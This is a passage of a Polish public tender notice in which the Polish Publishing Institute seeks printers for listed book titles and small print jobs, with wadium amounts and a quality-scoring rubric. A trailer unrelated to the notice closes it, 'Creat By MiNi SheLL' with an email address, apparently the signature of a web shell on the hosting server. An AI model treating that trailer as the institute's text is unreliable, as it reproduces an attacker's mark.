c) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia publicznego,
d) czy podmiot, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Oferta musi być zabezpieczona wadium w wysokościach
- dla Części I - 2 000 zł (słownie: dwa tysiące złotych),
- dla Części II  2 000 zł (słownie: dwa tysiące złotych).

Zamawiający nie wymaga wadium w odniesieniu do Części III zamówienia dot. druku małej publikacji. 
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena ofertowa brutto</td><td>60</td></tr><tr><td>Jakość</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje (z uwzględnieniem zmian dopuszczony wprost w przepisach ustawy Pzp  art. 144 ust. 1 pkt 2)  6)) możliwości dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, w następujących okolicznościach:

1) zmian uwarunkowań prawnych i formalnych realizacji przedmiotowej umowy będących następstwem działań osób trzecich,

2) zmian, które spowodują obniżenie kosztów ponoszonych przez Zamawiającego,

3) zmian osób funkcyjnych, wymienionych w umowie,

4) zmiany terminu realizacji poszczególnych zleceń publikacji książkowych, jak również zmiany końcowego terminu realizacji Przedmiotu umowy dot. określonej Części zamówienia, w szczególności poprzez ich skrócenie lub wydłużenie, w przypadku zaistnienia uzasadnionych okoliczności dotyczących zmian planów wydawniczych lub potrzeb w zakresie małej poligrafii Polskiego Instytutu Wydawniczego.  
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 08/05/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część I obejmuje druk publikacji książkowych:
	
Tytuł publikacji	Liczba egzemplarzy
1. Eliade  Sacrum-mit-historia	1000
2. Lawrence  Monastycyzm średniowieczny	1000
3. Teatr Publiczny. Przedstawienia. Dwudziestolecie.	700
4. Gibbon  Zmierzch cesarstwa rzymskiego t.1	1500
5. Gibbon  Zmierzch cesarstwa rzymskiego t.2	1500
6. Gibbon  Upadek cywilizacji zachodu	1500
7. Białoszewski  Oho i inne wiersze. Utwory zebrane t.10	1000
8.Sweeney  Cochise. Wódz Apaczów	1500
9.Rosendorfer  Budowniczy ruin	1000
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>79810000-5, 79810000-5,
                    79820000-8,
                    22100000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena ofertowa brutto</td><td>60</td></tr><tr><td>Jakość</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Ocena punktowa w kryterium II  Jakość - dokonana zostanie dla Części I i Części II na podstawie tego samego egzemplarza książki dostarczonego wraz z ofertą (w przypadku ubiegania się o obydwie Części: I i II ocena odbędzie się jednocześnie w odniesieniu do obydwu części na podstawie jednego egzemplarza książki załączonej do oferty przez Wykonawcę) przez komisję przetargową powołaną przez Zamawiającego zgodnie z formułą:
W ramach kryterium Jakość można otrzymać maksymalnie 40 punktów w ramach poniższych podkryteriów:

1. OPRAWA TWARDA (0-9 PKT)
1. prostokątność oprawy (brak - 0, zachowana - 1 pkt)
2. estetyka formy (brak  0, zachowana - 2 pkt)
3. estetyka montażu wyklejek (brak  0, zachowana - 2 pkt)
4. estetyka wykonania szycia bloku (brak  0, zachowana - 1 pkt)
5. wykonanie grzbietu (nieprawidłowe - 0, prawidłowe - 1 pkt)
6. wykonanie oklejki (nieprawidłowe - 0, prawidłowe - 1)
7. zawinięcie oklejki (nieprawidłowe  0, prawidłowe  1)

2. OKŁADKA DRUK MIN. Z 4 KOLORÓW (0-12 PKT)
1. pasowanie barwa (brak  0, zachowane - 5 pkt)
2. czystość druku (brak  0, zachowana - 2 pkt)
3. utrzymanie stabilności koloru (brak  0, zachowane - 3 pkt)
4. jednolitość zadruku (bez pasów lub zabrudzeń) (brak jednolitości - 0, zachowana -2 pkt) 

3. BLOK, DRUK MIN. Z 4 KOLORÓW (0-16 PKT)
1. pasowanie kolorów (brak  0, zachowane - 5 pkt)
2. czystość druku (brak  0, zachowana - 2 pkt)
3. utrzymanie stabilności koloru (brak  0, zachowana - 3 pkt)
4. jednolitość zadruku (bez pasów lub zabrudzeń) (brak jednolitości  0, zachowana - 2 pkt)
5. przycięcie bloku (nieprawidłowe  0, prawidłowe -1 pkt)
6. okrojenie marginesów (zachowanie równomierności) (nieprawidłowe  0, prawidłowe - 2 pkt)
7. falowanie papieru (falowanie  0 pkt  brak falowania - 1 pkt)

4. USZLACHETNIENIA  FOLIA NA OKŁADCE (0-3 PKT)
1. estetyka nałożenia (brak  0, zachowana -1 pkt)
2. wykończenie powierzchni (nieprawidłowe  0, prawidłowe - 1 pkt)
3. przyleganie (nieprawidłowe  0, prawidłowe - 1 pkt).
 
Ocena w kryterium Jakość zostanie dokonana w odniesieniu do książki wydrukowanej przez Wykonawcę i dostarczonej przez Wykonawcę wraz z ofertą.
Oceniana książka powinna spełniać następujące wymogi:
1. wydrukowana nie wcześniej niż 6 miesięcy przed upływem terminu składnia ofert,
2. w twardej oprawie,
3. licząca minimum 300 stron.
W przypadku nie złożenia przez Wykonawcę wraz z ofertą książki lub złożenia wraz z ofertą książki nie spełniającej ww. wymagań, oferta Wykonawcy zostanie odrzucona, na podstawie art. 89 ust. 1 pkt 2 ustawy Pzp, jako niezgodna z treścią SIWZ. 

Ocena jakościowa zostanie przeprowadzona przez komisję przetargową powołaną przez Zamawiającego. 

Łączna ilość uzyskanych przez ofertę punktów przyznanych przez każdego z członków komisji przetargowej zostanie podzielona przez liczbę członków komisji przetargowej.

Środki techniczne, materiały oraz personel, które Wykonawca zastosował do druku egzemplarza książki podlegającego ocenie przez komisję przetargową Zamawiającego w ramach kryterium Jakość zostaną wykorzystane przez Wykonawcę (lub równoważne środki techniczne, materiały oraz personel, tj, nie gorsze lub z nie gorszym kwalifikacjami) do realizacji druku publikacji książkowych w ramach niniejszego zamówienia publicznego dla Części I.
<br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część II obejmuje druk publikacji:
	
Tytuł publikacji	Liczba egzemplarzy
1. Roussel  Locus Solus	1000
2. Choromański  Schodami w górę, schodami w dół	1000
3. Zientara  Świt narodów europejskich	1000
4. Białoszewski  t. 14. Utwory zebrane	2000
5. Kierul  Benjamin Franklin	1000
6. Witkiewicz  Listy t. 2 wol. 2 (podzielony na 2 tomy)	2000
7. Molier  Dramaty wybrane  t. 1 i 2	800
8.Szemiński  Inka
	1200
9 .Marian Golka  Paradoksy wolności	1000
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>79800000-2, 79810000-5,
                    79820000-8,
                    22100000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena ofertowa brutto</td><td>60</td></tr><tr><td>Jakość</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Ocena punktowa w kryterium I dokonana zostanie odrębnie dla Części II zgodnie z formułą:
                            cena minimalna brutto
C = -------------------------------------------------- x 60 
                          cena badanej oferty brutto

Ocena punktowa w kryterium II  Jakość - dokonana zostanie dla Części I i Części II na podstawie tego samego egzemplarza książki dostarczonego wraz z ofertą (w przypadku ubiegania się o obydwie Części: I i II ocena odbędzie się jednocześnie w odniesieniu do obydwu części na podstawie jednego egzemplarza książki załączonej do oferty przez Wykonawcę) przez komisję przetargową powołaną przez Zamawiającego zgodnie z formułą:

W ramach kryterium Jakość można otrzymać maksymalnie 40 punktów w ramach poniższych podkryteriów:

1. OPRAWA TWARDA (0-9 PKT)
1. prostokątność oprawy (brak - 0, zachowana - 1 pkt)
2. estetyka formy (brak  0, zachowana - 2 pkt)
3. estetyka montażu wyklejek (brak  0, zachowana - 2 pkt)
4. estetyka wykonania szycia bloku (brak  0, zachowana - 1 pkt)
5. wykonanie grzbietu (nieprawidłowe - 0, prawidłowe - 1 pkt)
6. wykonanie oklejki (nieprawidłowe - 0, prawidłowe - 1)
7. zawinięcie oklejki (nieprawidłowe  0, prawidłowe  1)

2. OKŁADKA DRUK MIN. Z 4 KOLORÓW (0-12 PKT)
1. pasowanie barwa (brak  0, zachowane - 5 pkt)
2. czystość druku (brak  0, zachowana - 2 pkt)
3. utrzymanie stabilności koloru (brak  0, zachowane - 3 pkt)
4. jednolitość zadruku (bez pasów lub zabrudzeń) (brak jednolitości - 0, zachowana -2 pkt) 

3. BLOK, DRUK MIN. Z 4 KOLORÓW (0-16 PKT)
1. pasowanie kolorów (brak  0, zachowane - 5 pkt)
2. czystość druku (brak  0, zachowana - 2 pkt)
3. utrzymanie stabilności koloru (brak  0, zachowana - 3 pkt)
4. jednolitość zadruku (bez pasów lub zabrudzeń) (brak jednolitości  0, zachowana - 2 pkt)
5. przycięcie bloku (nieprawidłowe  0, prawidłowe -1 pkt)
6. okrojenie marginesów (zachowanie równomierności) (nieprawidłowe  0, prawidłowe - 2 pkt)
7. falowanie papieru (falowanie  0 pkt  brak falowania - 1 pkt)

4. USZLACHETNIENIA  FOLIA NA OKŁADCE (0-3 PKT)
1. estetyka nałożenia (brak  0, zachowana -1 pkt)
2. wykończenie powierzchni (nieprawidłowe  0, prawidłowe - 1 pkt)
3. przyleganie (nieprawidłowe  0, prawidłowe - 1 pkt).
 
Ocena w kryterium Jakość zostanie dokonana w odniesieniu do książki wydrukowanej przez Wykonawcę i dostarczonej przez Wykonawcę wraz z ofertą.
Oceniana książka powinna spełniać następujące wymogi:
1. wydrukowana nie wcześniej niż 6 miesięcy przed upływem terminu składnia ofert,
2. w twardej oprawie,
3. licząca minimum 300 stron.

W przypadku nie złożenia przez Wykonawcę wraz z ofertą książki lub złożenia wraz z ofertą książki nie spełniającej ww. wymagań, oferta Wykonawcy zostanie odrzucona, na podstawie art. 89 ust. 1 pkt 2 ustawy Pzp, jako niezgodna z treścią SIWZ. 

Ocena jakościowa zostanie przeprowadzona przez komisję przetargową powołaną przez Zamawiającego. 

Łączna ilość uzyskanych przez ofertę punktów przyznanych przez każdego z członków komisji przetargowej zostanie podzielona przez liczbę członków komisji przetargowej.

Środki techniczne, materiały oraz personel, które Wykonawca zastosował do druku egzemplarza książki podlegającego ocenie przez komisję przetargową Zamawiającego w ramach kryterium Jakość zostaną wykorzystane przez Wykonawcę (lub równoważne środki techniczne, materiały oraz personel, tj, nie gorsze lub z nie gorszym kwalifikacjami) do realizacji druku publikacji książkowych w ramach niniejszego zamówienia publicznego dla Części II.

<br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część III obejmuje druki małej poligrafii:
Nazwa druku	Liczba zamówień i nakład	Łączny nakład 
1.plakaty A2	15 x 150 szt.	2250
2.zaproszenia DL	15 x 200 szt.	3000
3.wizytówki 14 x 150 szt.	2100
4.pocztówki	2 x 500 szt.	1000
5.katalog wydawniczy	1000 szt.	1000
5. teczka	500 szt.	500
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>79800000-2, 22100000-1,
                    79810000-5,
                    79820000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena ofertowa brutto</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Ocena punktowa w kryterium I dokonana zostanie odrębnie dla Części III zgodnie z formułą:

                   cena minimalna brutto
C = -------------------------------------------------- x 100 
         	cena badanej oferty brutto

Za najkorzystniejszą w Części III zostanie uznana oferta najtańsza.<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com